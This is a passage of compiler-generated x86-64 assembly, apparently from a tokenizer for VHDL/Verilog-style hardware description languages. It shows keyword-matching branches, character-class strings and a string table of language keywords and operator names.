___strcpy_chk jmp LBB2_202 LBB2_82: movq -8(%rbp), %rdi leaq L_.str.67(%rip), %rsi callq _strcmp cmpl $0, %eax jne LBB2_84 ## %bb.83: movq -16(%rbp), %rdi leaq L_.str.67(%rip), %rsi movq $-1, %rdx callq ___strcpy_chk jmp LBB2_202 LBB2_84: movq -8(%rbp), %rdi leaq L_.str.68(%rip), %rsi callq _strcmp cmpl $0, %eax jne LBB2_86 ## %bb.85: movq -16(%rbp), %rdi leaq L_.str.68(%rip), %rsi movq $-1, %rdx callq ___strcpy_chk jmp LBB2_202 LBB2_86: movq -8(%rbp), %rdi leaq L_.str.69(%rip), %rsi callq _strcmp cmpl $0, %eax jne LBB2_88 ## %bb.87: movq -16(%rbp), %rdi leaq L_.str.69(%rip), %rsi movq $-1, %rdx callq ___strcpy_chk jmp LBB2_202 LBB2_88: movq -8(%rbp), %rdi leaq L_.str.70(%rip), %rsi callq _strcmp cmpl $0, %eax jne LBB2_90 ## %bb.89: movq -16(%rbp), %rdi leaq L_.str.70(%rip), %rsi movq $-1, %rdx callq ___strcpy_chk jmp LBB2_202 LBB2_90: movq -8(%rbp), %rdi leaq L_.str.3(%rip), %rsi callq _strcmp cmpl $0, %eax jne LBB2_92 ## %bb.91: movq -16(%rbp), %rdi leaq L_.str.3(%rip), %rsi movq $-1, %rdx callq ___strcpy_chk jmp LBB2_202 LBB2_92: movq -8(%rbp), %rdi leaq L_.str.71(%rip), %rsi callq _strcmp cmpl $0, %eax jne LBB2_94 ## %bb.93: movq -16(%rbp), %rdi leaq L_.str.71(%rip), %rsi movq $-1, %rdx callq ___strcpy_chk jmp LBB2_202 LBB2_94: movq -8(%rbp), %rdi leaq L_.str.72(%rip), %rsi callq _strcmp cmpl $0, %eax jne LBB2_96 ## %bb.95: movq -16(%rbp), %rdi leaq L_.str.72(%rip), %rsi movq $-1, %rdx callq ___strcpy_chk jmp LBB2_202 LBB2_96: movq -8(%rbp), %rdi leaq L_.str.73(%rip), %rsi callq _strcmp cmpl $0, %eax jne LBB2_98 ## %bb.97: movq -16(%rbp), %rdi leaq L_.str.73(%rip), %rsi movq $-1, %rdx callq ___strcpy_chk jmp LBB2_202 LBB2_98: movq -8(%rbp), %rdi leaq L_.str.74(%rip), %rsi callq _strcmp cmpl $0, %eax jne LBB2_100 ## %bb.99: movq -16(%rbp), %rdi leaq L_.str.74(%rip), %rsi movq $-1, %rdx callq ___strcpy_chk jmp LBB2_202 LBB2_100: movq -8(%rbp), %rdi leaq L_.str.75(%rip), %rsi callq _strcmp cmpl $0, %eax jne LBB2_102 ## %bb.101: movq -16(%rbp), %rdi leaq L_.str.75(%rip), %rsi movq $-1, %rdx callq ___strcpy_chk jmp LBB2_202 LBB2_102: movq -8(%rbp), %rdi leaq L_.str.76(%rip), %rsi callq _strcmp cmpl $0, %eax jne LBB2_104 ## %bb.103: movq -16(%rbp), %rdi leaq L_.str.76(%rip), %rsi movq $-1, %rdx callq ___strcpy_chk jmp LBB2_202 LBB2_104: movq -8(%rbp), %rdi leaq L_.str.77(%rip), %rsi callq _strcmp cmpl $0, %eax jne LBB2_106 ## %bb.105: movq -16(%rbp), %rdi leaq L_.str.77(%rip), %rsi movq $-1, %rdx callq ___strcpy_chk jmp LBB2_202 LBB2_106: movq -8(%rbp), %rdi leaq L_.str.78(%rip), %rsi callq _strcmp cmpl $0, %eax jne LBB2_108 ## %bb.107: movq -16(%rbp), %rdi leaq L_.str.78(%rip), %rsi movq $-1, %rdx callq ___strcpy_chk jmp LBB2_202 LBB2_108: movq -8(%rbp), %rdi leaq L_.str.79(%rip), %rsi callq _strcmp cmpl $0, %eax jne LBB2_110 ## %bb.109: movq -16(%rbp), %rdi leaq L_.str.79(%rip), %rsi movq $-1, %rdx callq ___strcpy_chk jmp LBB2_202 LBB2_110: movq -8(%rbp), %rdi leaq L_.str.80(%rip), %rsi callq _strcmp cmpl $0, %eax jne LBB2_112 ## %bb.111: movq -16(%rbp), %rdi leaq L_.str.80(%rip), %rsi movq $-1, %rdx callq ___strcpy_chk jmp LBB2_202 LBB2_112: movq -8(%rbp), %rdi leaq L_.str.81(%rip), %rsi callq _strcmp cmpl $0, %eax jne LBB2_114 ## %bb.113: movq -16(%rbp), %rdi leaq L_.str.81(%rip), %rsi movq $-1, %rdx callq ___strcpy_chk jmp LBB2_202 LBB2_114: movq -8(%rbp), %rdi leaq L_.str.82(%rip), %rsi callq _strcmp cmpl $0, %eax jne LBB2_116 ## %bb.115: movq -16(%rbp), %rdi leaq L_.str.82(%rip), %rsi movq $-1, %rdx callq ___strcpy_chk jmp LBB2_202 LBB2_116: movq -8(%rbp), %rdi leaq L_.str.83(%rip), %rsi callq _strcmp cmpl $0, %eax jne LBB2_118 ## %bb.117: movq -16(%rbp), %rdi leaq L_.str.83(%rip), %rsi movq $-1, %rdx callq ___strcpy_chk jmp LBB2_202 LBB2_118: movq -8(%rbp), %rdi leaq L_.str.84(%rip), %rsi callq _strcmp cmpl $0, %eax jne LBB2_120 ## %bb.119: movq -16(%rbp), %rdi leaq L_.str.84(%rip), %rsi movq $-1, %rdx callq ___strcpy_chk jmp LBB2_202 LBB2_120: movq -8(%rbp), %rdi leaq L_.str.85(%rip), %rsi callq _strcmp cmpl $0, %eax jne LBB2_122 ## %bb.121: movq -16(%rbp), %rdi leaq L_.str.85(%rip), %rsi movq $-1, %rdx callq ___strcpy_chk jmp LBB2_202 LBB2_122: movq -8(%rbp), %rdi leaq L_.str.86(%rip), %rsi callq _strcmp cmpl $0, %eax jne LBB2_124 ## %bb.123: movq -16(%rbp), %rdi leaq L_.str.86(%rip), %rsi movq $-1, %rdx callq ___strcpy_chk jmp LBB2_202 LBB2_124: movq -8(%rbp), %rdi leaq L_.str.87(%rip), %rsi callq _strcmp cmpl $0, %eax jne LBB2_126 ## %bb.125: movq -16(%rbp), %rdi leaq L_.str.87(%rip), %rsi movq $-1, %rdx callq ___strcpy_chk jmp LBB2_202 LBB2_126: movq -8(%rbp), %rdi leaq L_.str.88(%rip), %rsi callq _strcmp cmpl $0, %eax jne LBB2_128 ## %bb.127: movq -16(%rbp), %rdi leaq L_.str.88(%rip), %rsi movq $-1, %rdx callq ___strcpy_chk jmp LBB2_202 LBB2_128: movq -8(%rbp), %rdi leaq L_.str.89(%rip), %rsi callq _strcmp cmpl $0, %eax jne LBB2_130 ## %bb.129: movq -16(%rbp), %rdi leaq L_.str.89(%rip), %rsi movq $-1, %rdx callq ___strcpy_chk jmp LBB2_202 LBB2_130: movq -8(%rbp), %rdi leaq L_.str.20(%rip), %rsi callq _strcmp cmpl $0, %eax jne LBB2_132 ## %bb.131: movq -16(%rbp), %rdi leaq L_.str.20(%rip), %rsi movq $-1, %rdx callq ___strcpy_chk jmp LBB2_202 LBB2_132: movq -8(%rbp), %rdi leaq L_.str.90(%rip), %rsi callq _strcmp cmpl $0, %eax jne LBB2_134 ## %bb.133: movq -16(%rbp), %rdi leaq L_.str.90(%rip), %rsi movq $-1, %rdx callq ___strcpy_chk jmp LBB2_202 LBB2_134: movq -8(%rbp), %rdi leaq L_.str.91(%rip), %rsi callq _strcmp cmpl $0, %eax jne LBB2_136 ## %bb.135: movq -16(%rbp), %rdi leaq L_.str.91(%rip), %rsi movq $-1, %rdx callq ___strcpy_chk jmp LBB2_202 LBB2_136: movq -8(%rbp), %rdi leaq L_.str.92(%rip), %rsi callq _strcmp cmpl $0, %eax jne LBB2_138 ## %bb.137: movq -16(%rbp), %rdi leaq L_.str.92(%rip), %rsi movq $-1, %rdx callq ___strcpy_chk jmp LBB2_202 LBB2_138: movq -8(%rbp), %rdi leaq L_.str.93(%rip), %rsi callq _strcmp cmpl $0, %eax jne LBB2_140 ## %bb.139: movq -16(%rbp), %rdi leaq L_.str.93(%rip), %rsi movq $-1, %rdx callq ___strcpy_chk jmp LBB2_202 LBB2_140: movq -8(%rbp), %rdi leaq L_.str.94(%rip), %rsi callq _strcmp cmpl $0, %eax jne LBB2_142 ## %bb.141: movq -16(%rbp), %rdi leaq L_.str.94(%rip), %rsi movq $-1, %rdx callq ___strcpy_chk jmp LBB2_202 LBB2_142: movq -8(%rbp), %rdi leaq L_.str.95(%rip), %rsi callq _strcmp cmpl $0, %eax jne LBB2_144 ## %bb.143: movq -16(%rbp), %rdi leaq L_.str.95(%rip), %rsi movq $-1, %rdx callq ___strcpy_chk jmp LBB2_202 LBB2_144: movq -8(%rbp), %rdi leaq L_.str.96(%rip), %rsi callq _strcmp cmpl $0, %eax jne LBB2_146 ## %bb.145: movq -16(%rbp), %rdi leaq L_.str.96(%rip), %rsi movq $-1, %rdx callq ___strcpy_chk jmp LBB2_202 LBB2_146: movq -8(%rbp), %rdi leaq L_.str.97(%rip), %rsi callq _strcmp cmpl $0, %eax jne LBB2_148 ## %bb.147: movq -16(%rbp), %rdi leaq L_.str.97(%rip), %rsi movq $-1, %rdx callq ___strcpy_chk jmp LBB2_202 LBB2_148: movq -8(%rbp), %rdi leaq L_.str.98(%rip), %rsi callq _strcmp cmpl $0, %eax jne LBB2_150 ## %bb.149: movq -16(%rbp), %rdi leaq L_.str.98(%rip), %rsi movq $-1, %rdx callq ___strcpy_chk jmp LBB2_202 LBB2_150: movq -8(%rbp), %rdi leaq L_.str.99(%rip), %rsi callq _strcmp cmpl $0, %eax jne LBB2_152 ## %bb.151: movq -16(%rbp), %rdi leaq L_.str.99(%rip), %rsi movq $-1, %rdx callq ___strcpy_chk jmp LBB2_202 LBB2_152: movq -8(%rbp), %rdi leaq L_.str.100(%rip), %rsi callq _strcmp cmpl $0, %eax jne LBB2_154 ## %bb.153: movq -16(%rbp), %rdi leaq L_.str.100(%rip), %rsi movq $-1, %rdx callq ___strcpy_chk jmp LBB2_202 LBB2_154: movq -8(%rbp), %rdi leaq L_.str.101(%rip), %rsi callq _strcmp cmpl $0, %eax jne LBB2_156 ## %bb.155: movq -16(%rbp), %rdi leaq L_.str.101(%rip), %rsi movq $-1, %rdx callq ___strcpy_chk jmp LBB2_202 LBB2_156: movq -8(%rbp), %rdi leaq L_.str.22(%rip), %rsi callq _strcmp cmpl $0, %eax jne LBB2_158 ## %bb.157: movq -16(%rbp), %rdi leaq L_.str.22(%rip), %rsi movq $-1, %rdx callq ___strcpy_chk jmp LBB2_202 LBB2_158: movq -8(%rbp), %rdi leaq L_.str.102(%rip), %rsi callq _strcmp cmpl $0, %eax jne LBB2_160 ## %bb.159: movq -16(%rbp), %rdi leaq L_.str.102(%rip), %rsi movq $-1, %rdx callq ___strcpy_chk jmp LBB2_202 LBB2_160: movq -8(%rbp), %rdi leaq L_.str.103(%rip), %rsi callq _strcmp cmpl $0, %eax jne LBB2_162 ## %bb.161: movq -16(%rbp), %rdi leaq L_.str.103(%rip), %rsi movq $-1, %rdx callq ___strcpy_chk jmp LBB2_202 LBB2_162: movq -8(%rbp), %rdi leaq L_.str.104(%rip), %rsi callq _strcmp cmpl $0, %eax jne LBB2_164 ## %bb.163: movq -16(%rbp), %rdi leaq L_.str.104(%rip), %rsi movq $-1, %rdx callq ___strcpy_chk jmp LBB2_202 LBB2_164: movq -8(%rbp), %rdi leaq L_.str.17(%rip), %rsi callq _strcmp cmpl $0, %eax jne LBB2_166 ## %bb.165: movq -16(%rbp), %rdi leaq L_.str.17(%rip), %rsi movq $-1, %rdx callq ___strcpy_chk jmp LBB2_202 LBB2_166: movq -8(%rbp), %rdi leaq L_.str.105(%rip), %rsi callq _strcmp cmpl $0, %eax jne LBB2_168 ## %bb.167: movq -16(%rbp), %rdi leaq L_.str.105(%rip), %rsi movq $-1, %rdx callq ___strcpy_chk jmp LBB2_202 LBB2_168: movq -8(%rbp), %rdi leaq L_.str.106(%rip), %rsi callq _strcmp cmpl $0, %eax jne LBB2_170 ## %bb.169: movq -16(%rbp), %rdi leaq L_.str.106(%rip), %rsi movq $-1, %rdx callq ___strcpy_chk jmp LBB2_202 LBB2_170: movq -8(%rbp), %rdi leaq L_.str.106(%rip), %rsi callq _strcmp cmpl $0, %eax jne LBB2_172 ## %bb.171: movq -16(%rbp), %rdi leaq L_.str.106(%rip), %rsi movq $-1, %rdx callq ___strcpy_chk jmp LBB2_202 LBB2_172: movq -8(%rbp), %rdi leaq L_.str.15(%rip), %rsi callq _strcmp cmpl $0, %eax jne LBB2_174 ## %bb.173: movq -16(%rbp), %rdi leaq L_.str.15(%rip), %rsi movq $-1, %rdx callq ___strcpy_chk jmp LBB2_202 LBB2_174: movq -8(%rbp), %rdi leaq L_.str.107(%rip), %rsi callq _strcmp cmpl $0, %eax jne LBB2_176 ## %bb.175: movq -16(%rbp), %rdi leaq L_.str.107(%rip), %rsi movq $-1, %rdx callq ___strcpy_chk jmp LBB2_202 LBB2_176: movq -8(%rbp), %rdi leaq L_.str.108(%rip), %rsi callq _strcmp cmpl $0, %eax jne LBB2_178 ## %bb.177: movq -16(%rbp), %rdi leaq L_.str.108(%rip), %rsi movq $-1, %rdx callq ___strcpy_chk jmp LBB2_202 LBB2_178: movq -8(%rbp), %rdi leaq L_.str.109(%rip), %rsi callq _strcmp cmpl $0, %eax jne LBB2_180 ## %bb.179: movq -16(%rbp), %rdi leaq L_.str.109(%rip), %rsi movq $-1, %rdx callq ___strcpy_chk jmp LBB2_202 LBB2_180: movq -8(%rbp), %rdi leaq L_.str.110(%rip), %rsi callq _strcmp cmpl $0, %eax jne LBB2_182 ## %bb.181: movq -16(%rbp), %rdi leaq L_.str.110(%rip), %rsi movq $-1, %rdx callq ___strcpy_chk jmp LBB2_202 LBB2_182: movq -8(%rbp), %rdi leaq L_.str.111(%rip), %rsi callq _strcmp cmpl $0, %eax jne LBB2_184 ## %bb.183: movq -16(%rbp), %rdi leaq L_.str.111(%rip), %rsi movq $-1, %rdx callq ___strcpy_chk jmp LBB2_202 LBB2_184: movq -8(%rbp), %rdi leaq L_.str.112(%rip), %rsi callq _strcmp cmpl $0, %eax jne LBB2_186 ## %bb.185: movq -16(%rbp), %rdi leaq L_.str.112(%rip), %rsi movq $-1, %rdx callq ___strcpy_chk jmp LBB2_202 LBB2_186: movq -8(%rbp), %rdi leaq L_.str.113(%rip), %rsi callq _strcmp cmpl $0, %eax jne LBB2_188 ## %bb.187: movq -16(%rbp), %rdi leaq L_.str.113(%rip), %rsi movq $-1, %rdx callq ___strcpy_chk jmp LBB2_202 LBB2_188: movq -8(%rbp), %rdi leaq L_.str.114(%rip), %rsi callq _strcmp cmpl $0, %eax jne LBB2_190 ## %bb.189: movq -16(%rbp), %rdi leaq L_.str.114(%rip), %rsi movq $-1, %rdx callq ___strcpy_chk jmp LBB2_202 LBB2_190: movq -8(%rbp), %rdi leaq L_.str.115(%rip), %rsi callq _strcmp cmpl $0, %eax jne LBB2_192 ## %bb.191: movq -16(%rbp), %rdi leaq L_.str.115(%rip), %rsi movq $-1, %rdx callq ___strcpy_chk jmp LBB2_202 LBB2_192: movq -8(%rbp), %rdi leaq L_.str.116(%rip), %rsi callq _strcmp cmpl $0, %eax jne LBB2_194 ## %bb.193: movq -16(%rbp), %rdi leaq L_.str.116(%rip), %rsi movq $-1, %rdx callq ___strcpy_chk jmp LBB2_202 LBB2_194: movq -8(%rbp), %rdi leaq L_.str.117(%rip), %rsi callq _strcmp cmpl $0, %eax jne LBB2_196 ## %bb.195: movq -16(%rbp), %rdi leaq L_.str.118(%rip), %rsi movq $-1, %rdx callq ___strcpy_chk jmp LBB2_202 LBB2_196: movq -8(%rbp), %rdi leaq L_.str.119(%rip), %rsi callq _strcmp cmpl $0, %eax jne LBB2_198 ## %bb.197: movq -16(%rbp), %rdi leaq L_.str.118(%rip), %rsi movq $-1, %rdx callq ___strcpy_chk jmp LBB2_202 LBB2_198: movq -8(%rbp), %rdi leaq L_.str.120(%rip), %rsi callq _strcmp cmpl $0, %eax jne LBB2_200 ## %bb.199: movq -16(%rbp), %rdi leaq L_.str.118(%rip), %rsi movq $-1, %rdx callq ___strcpy_chk jmp LBB2_202 LBB2_200: movq -8(%rbp), %rdi leaq L_.str.121(%rip), %rsi callq _strcmp cmpl $0, %eax jne LBB2_202 ## %bb.201: movq -16(%rbp), %rdi leaq L_.str.118(%rip), %rsi movq $-1, %rdx callq ___strcpy_chk LBB2_202: addq $16, %rsp popq %rbp retq .cfi_endproc ## -- End function .globl _doubleNames ## -- Begin function doubleNames .p2align 4, 0x90 _doubleNames: ## @doubleNames .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $16, %rsp movq %rdi, -8(%rbp) movq %rsi, -16(%rbp) movq -8(%rbp), %rdi leaq L_.str.122(%rip), %rsi callq _strcmp cmpl $0, %eax jne LBB3_2 ## %bb.1: movq -16(%rbp), %rdi leaq L_.str.123(%rip), %rsi movq $-1, %rdx callq ___strcpy_chk jmp LBB3_32 LBB3_2: movq -8(%rbp), %rdi leaq L_.str.124(%rip), %rsi callq _strcmp cmpl $0, %eax jne LBB3_4 ## %bb.3: movq -16(%rbp), %rdi leaq L_.str.125(%rip), %rsi movq $-1, %rdx callq ___strcpy_chk jmp LBB3_32 LBB3_4: movq -8(%rbp), %rdi leaq L_.str.126(%rip), %rsi callq _strcmp cmpl $0, %eax jne LBB3_6 ## %bb.5: movq -16(%rbp), %rdi leaq L_.str.127(%rip), %rsi movq $-1, %rdx callq ___strcpy_chk jmp LBB3_32 LBB3_6: movq -8(%rbp), %rdi leaq L_.str.128(%rip), %rsi callq _strcmp cmpl $0, %eax jne LBB3_8 ## %bb.7: movq -16(%rbp), %rdi leaq L_.str.129(%rip), %rsi movq $-1, %rdx callq ___strcpy_chk jmp LBB3_32 LBB3_8: movq -8(%rbp), %rdi leaq L_.str.130(%rip), %rsi callq _strcmp cmpl $0, %eax jne LBB3_10 ## %bb.9: movq -16(%rbp), %rdi leaq L_.str.131(%rip), %rsi movq $-1, %rdx callq ___strcpy_chk jmp LBB3_32 LBB3_10: movq -8(%rbp), %rdi leaq L_.str.132(%rip), %rsi callq _strcmp cmpl $0, %eax jne LBB3_12 ## %bb.11: movq -16(%rbp), %rdi leaq L_.str.133(%rip), %rsi movq $-1, %rdx callq ___strcpy_chk jmp LBB3_32 LBB3_12: movq -8(%rbp), %rdi leaq L_.str.134(%rip), %rsi callq _strcmp cmpl $0, %eax jne LBB3_14 ## %bb.13: movq -16(%rbp), %rdi leaq L_.str.123(%rip), %rsi movq $-1, %rdx callq ___strcpy_chk jmp LBB3_32 LBB3_14: movq -8(%rbp), %rdi leaq L_.str.135(%rip), %rsi callq _strcmp cmpl $0, %eax jne LBB3_16 ## %bb.15: movq -16(%rbp), %rdi leaq L_.str.136(%rip), %rsi movq $-1, %rdx callq ___strcpy_chk jmp LBB3_32 LBB3_16: movq -8(%rbp), %rdi leaq L_.str.137(%rip), %rsi callq _strcmp cmpl $0, %eax jne LBB3_18 ## %bb.17: movq -16(%rbp), %rdi leaq L_.str.138(%rip), %rsi movq $-1, %rdx callq ___strcpy_chk jmp LBB3_32 LBB3_18: movq -8(%rbp), %rdi leaq L_.str.139(%rip), %rsi callq _strcmp cmpl $0, %eax jne LBB3_20 ## %bb.19: movq -16(%rbp), %rdi leaq L_.str.140(%rip), %rsi movq $-1, %rdx callq ___strcpy_chk jmp LBB3_32 LBB3_20: movq -8(%rbp), %rdi leaq L_.str.141(%rip), %rsi callq _strcmp cmpl $0, %eax jne LBB3_22 ## %bb.21: movq -16(%rbp), %rdi leaq L_.str.142(%rip), %rsi movq $-1, %rdx callq ___strcpy_chk jmp LBB3_32 LBB3_22: movq -8(%rbp), %rdi leaq L_.str.143(%rip), %rsi callq _strcmp cmpl $0, %eax jne LBB3_24 ## %bb.23: movq -16(%rbp), %rdi leaq L_.str.144(%rip), %rsi movq $-1, %rdx callq ___strcpy_chk jmp LBB3_32 LBB3_24: movq -8(%rbp), %rdi leaq L_.str.145(%rip), %rsi callq _strcmp cmpl $0, %eax jne LBB3_26 ## %bb.25: movq -16(%rbp), %rdi leaq L_.str.146(%rip), %rsi movq $-1, %rdx callq ___strcpy_chk jmp LBB3_32 LBB3_26: movq -8(%rbp), %rdi leaq L_.str.147(%rip), %rsi callq _strcmp cmpl $0, %eax jne LBB3_28 ## %bb.27: movq -16(%rbp), %rdi leaq L_.str.148(%rip), %rsi movq $-1, %rdx callq ___strcpy_chk jmp LBB3_32 LBB3_28: movq -8(%rbp), %rdi leaq L_.str.149(%rip), %rsi callq _strcmp cmpl $0, %eax jne LBB3_30 ## %bb.29: movq -16(%rbp), %rdi leaq L_.str.150(%rip), %rsi movq $-1, %rdx callq ___strcpy_chk jmp LBB3_32 LBB3_30: movq -8(%rbp), %rdi leaq L_.str.151(%rip), %rsi callq _strcmp cmpl $0, %eax jne LBB3_32 ## %bb.31: movq -16(%rbp), %rdi leaq L_.str.152(%rip), %rsi movq $-1, %rdx callq ___strcpy_chk LBB3_32: addq $16, %rsp popq %rbp retq .cfi_endproc ## -- End function .globl _joinable ## -- Begin function joinable .p2align 4, 0x90 _joinable: ## @joinable .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp movq %rdi, -8(%rbp) movq %rsi, -16(%rbp) xorl %eax, %eax popq %rbp retq .cfi_endproc ## -- End function .section __DATA,__data .globl _strx0 ## @strx0 _strx0: .asciz "\t\n " .globl _strx1 ## @strx1 .zerofill __DATA,__common,_strx1,1,0 .globl _strx2 ## @strx2 _strx2: .asciz "-" .globl _strx3 ## @strx3 _strx3: .asciz "xXoObB" .globl _strx4 ## @strx4 _strx4: .asciz "\"" .globl _strx5 ## @strx5 .p2align 4 _strx5: .asciz "0123456789abcdefABCDEF_xX" .globl _strx6 ## @strx6 _strx6: .asciz "`" .globl _strx7 ## @strx7 .p2align 4 _strx7: .asciz "qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM" .globl _strx8 ## @strx8 .p2align 4 _strx8: .asciz "qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM0123456789_" .globl _strx9 ## @strx9 .p2align 4 _strx9: .asciz "qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM0123456789_." .globl _strx10 ## @strx10 _strx10: .asciz "0123456789" .globl _strx11 ## @strx11 _strx11: .asciz "." .globl _strx12 ## @strx12 _strx12: .asciz "'" .globl _strx13 ## @strx13 _strx13: .asciz "0123456789-Zz" .globl _strx14 ## @strx14 _strx14: .asciz "#" .globl _strx15 ## @strx15 _strx15: .asciz "01_xzXZ?" .globl _strx16 ## @strx16 _strx16: .asciz "b" .globl _strx17 ## @strx17 _strx17: .asciz "h" .globl _strx18 ## @strx18 _strx18: .asciz "d" .globl _strx19 ## @strx19 _strx19: .asciz "(" .globl _strx20 ## @strx20 _strx20: .asciz "*" .globl _strx21 ## @strx21 _strx21: .asciz ")" .globl _strx22 ## @strx22 _strx22: .asciz ":" .globl _strx23 ## @strx23 _strx23: .asciz "=" .globl _strx24 ## @strx24 _strx24: .asciz "+" .globl _strx25 ## @strx25 _strx25: .asciz "/" .globl _strx26 ## @strx26 _strx26: .asciz "-=!<>&|" .globl _strx27 ## @strx27 _strx27: .asciz "=<>&|" .globl _strx28 ## @strx28 .p2align 4 _strx28: .asciz "qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM0123456789\t\n _?.,[]{}#@()~%^;:/+-*-=!<>&|',\\" .globl _strx29 ## @strx29 .p2align 4 _strx29: .asciz "?.,[]{}#@()~%^;:/+-*" .globl _strx30 ## @strx30 _strx30: .asciz "\\" .globl _State ## @State .p2align 2 _State: .long 19 ## 0x13 .section __TEXT,__cstring,cstring_literals L_.str: ## @.str .asciz "add" L_.str.1: ## @.str.1 .asciz "0" L_.str.2: ## @.str.2 .asciz "push" L_.str.3: ## @.str.3 .asciz "literal" L_.str.4: ## @.str.4 .asciz "based" L_.str.5: ## @.str.5 .asciz "bin" L_.str.6: ## @.str.6 .asciz "double" L_.str.7: ## @.str.7 .asciz "define" L_.str.8: ## @.str.8 .asciz "dig" L_.str.9: ## @.str.9 .asciz "star" L_.str.10: ## @.str.10 .asciz "floating" L_.str.11: ## @.str.11 .asciz "hex" L_.str.12: ## @.str.12 .asciz "hexdig" L_.str.13: ## @.str.13 .asciz "none" L_.str.14: ## @.str.14 .asciz "skipline" L_.str.15: ## @.str.15 .asciz "token" L_.str.16: ## @.str.16 .asciz "number" L_.str.17: ## @.str.17 .asciz "tick" L_.str.18: ## @.str.18 .asciz "single" L_.str.19: ## @.str.19 .asciz "idle" L_.str.20: ## @.str.20 .asciz "power" L_.str.21: ## @.str.21 .asciz "pragma" L_.str.22: ## @.str.22 .asciz "string" L_.str.23: ## @.str.23 .asciz "ubin" L_.str.24: ## @.str.24 .asciz "udig" L_.str.25: ## @.str.25 .asciz "uhex" L_.str.26: ## @.str.26 .asciz "no action!!!! |%x| <%c> |%x| <%c> state=%d \n" L_.str.27: ## @.str.27 .asciz "Component" L_.str.28: ## @.str.28 .asciz "EqualLess" L_.str.29: ## @.str.29 .asciz "GreaterEqual" L_.str.30: ## @.str.30 .asciz "Postponed" L_.str.31: ## @.str.31 .asciz "after" L_.str.32: ## @.str.32 .asciz "alias" L_.str.33: ## @.str.33 .asciz "and" L_.str.34: ## @.str.34 .asciz "architecture" L_.str.35: ## @.str.35 .asciz "array" L_.str.36: ## @.str.36 .asciz "arrow" L_.str.37: ## @.str.37 .asciz "assert" L_.str.38: ## @.str.38 .asciz "attribute" L_.str.39: ## @.str.39 .asciz "begin" L_.str.40: ## @.str.40 .asciz "behavioral" L_.str.41: ## @.str.41 .asciz "block" L_.str.42: ## @.str.42 .asciz "body" L_.str.43: ## @.str.43 .asciz "buffer" L_.str.44: ## @.str.44 .asciz "case" L_.str.45: ## @.str.45 .asciz "cassign" L_.str.46: ## @.str.46 .asciz "configuration" L_.str.47: ## @.str.47 .asciz "constant" L_.str.48: ## @.str.48 .asciz "downto" L_.str.49: ## @.str.49 .asciz "else" L_.str.50: ## @.str.50 .asciz "elsif" L_.str.51: ## @.str.51 .asciz "end" L_.str.52: ## @.str.52 .asciz "entity" L_.str.53: ## @.str.53 .asciz "event" L_.str.54: ## @.str.54 .asciz "exit" L_.str.55: ## @.str.55 .asciz "file" L_.str.56: ## @.str.56 .asciz "for" L_.str.57: ## @.str.57 .asciz "function" L_.str.58: ## @.str.58 .asciz "generate" L_.str.59: ## @.str.59 .asciz "generic" L_.str.60: ## @.str.60 .asciz "guarded" L_.str.61: ## @.str.61 .asciz "hexstring" L_.str.62: ## @.str.62 .asciz "hobstring" L_.str.63: ## @.str.63 .asciz "if" L_.str.64: ## @.str.64 .asciz "impure" L_.str.65: ## @.str.65 .asciz "in" L_.str.66: ## @.str.66 .asciz "inertial" L_.str.67: ## @.str.67 .asciz "inout" L_.str.68: ## @.str.68 .asciz "is" L_.str.69: ## @.str.69 .asciz "library" L_.str.70: ## @.str.70 .asciz "linkage" L_.str.71: ## @.str.71 .asciz "loop" L_.str.72: ## @.str.72 .asciz "map" L_.str.73: ## @.str.73 .asciz "mod" L_.str.74: ## @.str.74 .asciz "nand" L_.str.75: ## @.str.75 .asciz "natural" L_.str.76: ## @.str.76 .asciz "neq" L_.str.77: ## @.str.77 .asciz "new" L_.str.78: ## @.str.78 .asciz "next" L_.str.79: ## @.str.79 .asciz "nor" L_.str.80: ## @.str.80 .asciz "not" L_.str.81: ## @.str.81 .asciz "null" L_.str.82: ## @.str.82 .asciz "of" L_.str.83: ## @.str.83 .asciz "on" L_.str.84: ## @.str.84 .asciz "openevent" L_.str.85: ## @.str.85 .asciz "or" L_.str.86: ## @.str.86 .asciz "others" L_.str.87: ## @.str.87 .asciz "out" L_.str.88: ## @.str.88 .asciz "package" L_.str.89: ## @.str.89 .asciz "port" L_.str.90: ## @.str.90 .asciz "procedure" L_.str.91: ## @.str.91 .asciz "process" L_.str.92: ## @.str.92 .asciz "pure" L_.str.93: ## @.str.93 .asciz "range" L_.str.94: ## @.str.94 .asciz "record" L_.str.95: ## @.str.95 .asciz "reject" L_.str.96: ## @.str.96 .asciz "report" L_.str.97: ## @.str.97 .asciz "return" L_.str.98: ## @.str.98 .asciz "select" L_.str.99: ## @.str.99 .asciz "shared" L_.str.100: ## @.str.100 .asciz "signal" L_.str.101: ## @.str.101 .asciz "srl" L_.str.102: ## @.str.102 .asciz "structural" L_.str.103: ## @.str.103 .asciz "subtype" L_.str.104: ## @.str.104 .asciz "then" L_.str.105: ## @.str.105 .asciz "timeunit" L_.str.106: ## @.str.106 .asciz "to" L_.str.107: ## @.str.107 .asciz "transport" L_.str.108: ## @.str.108 .asciz "type" L_.str.109: ## @.str.109 .asciz "until" L_.str.110: ## @.str.110 .asciz "use" L_.str.111: ## @.str.111 .asciz "variable" L_.str.112: ## @.str.112 .asciz "wait" L_.str.113: ## @.str.113 .asciz "when" L_.str.114: ## @.str.114 .asciz "while" L_.str.115: ## @.str.115 .asciz "with" L_.str.116: ## @.str.116 .asciz "xor" L_.str.117: ## @.str.117 .asciz "std_logic_vector" L_.str.118: ## @.str.118 .asciz "Types" L_.str.119: ## @.str.119 .asciz "std_logic" L_.str.120: ## @.str.120 .asciz "integer" L_.str.121: ## @.str.121 .asciz "bit_vector" L_.str.122: ## @.str.122 .asciz "!=" L_.str.123: ## @.str.123 .asciz "Neq" L_.str.124: ## @.str.124 .asciz "!^" L_.str.125: ## @.str.125 .asciz "xnor" L_.str.126: ## @.str.126 .asciz "&&" L_.str.127: ## @.str.127 .asciz "and_and" L_.str.128: ## @.str.128 .asciz "+:" L_.str.129: ## @.str.129 .asciz 